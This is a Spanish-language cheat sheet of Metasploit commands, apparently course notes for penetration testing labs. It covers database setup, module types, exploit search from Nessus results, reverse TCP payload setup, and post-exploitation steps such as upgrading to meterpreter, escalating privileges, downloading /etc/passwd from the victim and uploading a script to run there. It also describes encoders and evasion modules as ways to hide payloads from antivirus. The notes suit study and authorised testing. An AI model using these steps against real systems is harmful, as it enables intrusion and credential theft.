COMANDOS METASPLOIT
| msfdb | Muestra los parámetros que podemos utilizar |
| msfdb init | Primero inicializamos la base de datos en modo root sudo su |
| msfdb status | Para saber que la base de datos esta inicializada |
| msfconsole |
Para ejecutar el framework. Exploits: es un programa o una secuencia de comandos que se aprovecha de un error para provocar un fallo en el sistema. Se utiliza para explotación de las vulnerabilidades que vayamos encontrando. Auxiliary: se utiliza para actividades que ayuden a detectar como vulnerar una máquina, (realizar reconocimiento, DOS Post: se utiliza para los equipos que ya tenemos acceso Payloads: “Carga útil” Nos ayuda a crear aplicaciones con una carga maliciosa “virus” nos ayuda para obtener acceso remoto a un sistema Encoders: “módulo de codificación” nos ayuda a ocultar los pailots que creemos, para que no sea reconocida por los antivirus. Nops: Sirve para ejecutar los payloads de manera eficiente evitado que se detenga el proceso Evasion: Nos ayuda a evadir la detección de un antivirus o sistema de seguridad |
| help | Ver los comandos que podemos ejecutar |
| search samba | Buscar un servicio específico. Check quiere decir si es vulnerable o no |
| search samba type:exploit | Que nos muestre solo exploits |
| info (número que nos muestra en pantalla) 15 | Para ver la información de los exploits |
| Search payload/windows | Búsquedas de la plataforma o el módulo. Ejemplo: Muestra payloads |
EXPLOTAR VULNERABILIDADES (SERVICIOS)
| service nessusd start | Desde el modo root, iniciamos el servicio de nessus |
| msfdb run | Inicia metasploit |
| search (pegamos el contenido copiado) | pegamos lo que hemos copiado en Nessus, es donde pone que puede ser vulnerabilidad por metasploit |
| use (numero de la lista) | usar el script que le indicamos en el numero |
| show options | Ver todos los parámetros que cuenta el exploid |
| set RHOST (IP) | Modificar un valor |
| set RPORT_FTP (Numero de puerto) | Modifica el puerto |
| Set SITEPATH /var/www/html | Modificar la ruta del sitio |
| show payloads | Mostrar payloads, para poder utilizar uno |
| set payload (“ruta o nombre”name”) | Seleccionamos un payloads, conexión del maquina objetivo a nuestra máquina. Ejemplo el reverse TCP (vía Perl) |
| LHOST | Ponemos nuestra IP de nuestra máquina. LOCALHOST |
| LPORT | Maquina objetivo. LOCALPORT |
| set LHOST (nuestra ip) | Para darle un valor a LHOST |
| info | Para ver si es compatible con esta funcionalidad. Check supported: YES |
| check | Para verificarlo |
| exploit | Para ejecutar el exploit |
| set TARGETURI /drupal/ | Modifica el TARGETURI (/drupal/ esto es la ruta que hemos buscado desde la ip de la maquina victima en el buscador Firefox) |
| searchsploit UnrealIRCd | Busca información del sercicio , esto se hace fuera de metasploid |
| search UnrealIRCd | Buscar vulnerabilidad |
| set payload (nombre del payload o número) | Con el Bind TCP somos nosotros quien iniciamos las comunicaciones.El reverse tiene mas posibilidades de exito |
| sessions -h | Ver las opciones que tenemos con este comando |
| sessions | Lista las sesiones que tenemos abiertas, también se puede poner sessions -l |
| session -i (numero de ID) | Para tener acceso a una de las sesiones |
| session -i (numero de ID) -n (nombre que le queremos dar) | Para tener acceso a una de las sesiones y cambiarle el nombre |
POST EXPLOTACION
| search Shell to meterpreter type:post | Transforma una Shell en meterprete. solo lo busca en el módulo post |
| set SESION 3 | Ponemos la sesión de UNREAL que es la 3(esto lo editamos con el comando sesión -i 3 UNRE…) |
| sessions -i 4 -n meterpreteUnreal | Ha creado una nueva sesión y vamos a renombrar |
| sysinfo | Ver el sistema en el que estamos, ip, SO.. |
| getuid | Ver el usuario en el que estamos (Get user ID) |
| search type:post local exploit | Buscar vulnerabilidades locales post-explotacion. Desde metasploid |
| run (nombre de la ruta copiada) | Ejecutar el script que hemos buscado antes que contiene las palabras locales Exploit. El resultado muestra los scripts que podemos explotar (los verdes) Copiamos la vulnerabilidad para luego utilizarla |
| use (nombre de la ruta vulnerable a privilegios) | Entrar dentro de la vulnerabilidad |
| set sesión 4 | Asignar el número de sesión |
| getpid | Numero de proceso en el que estamos |
| ps | Ver los procesos que se están ejecutando actualmente |
| pgrep -h | Nos permite buscar según la cadena de caracteres que usemos. Ver las funcionalidadesque hace este comando |
| pgrep -f -l pkexec | Muestra el nombre del proceso y el ID |
| search -f *passwd | Buscar todo lo que contenga al final la palabra passwd |
| download -h | Descargar el contenido. Esté muestra las opciones que puede hacer |
| download /etc/ passwd UserLinux | Descarga dentro de la carpeta UserLinux (si no existe crea una automáticamente) |
| upload -h | Subir un archivo a la maquina victima |
| upload bash.sh (ruta si fuera necesario) | Sube el archivo bash.sh |
| sh bash.sh | Primero tenemos que entrar en Shell y luego ejecutar el script que has subido poniendo sh bash.sh |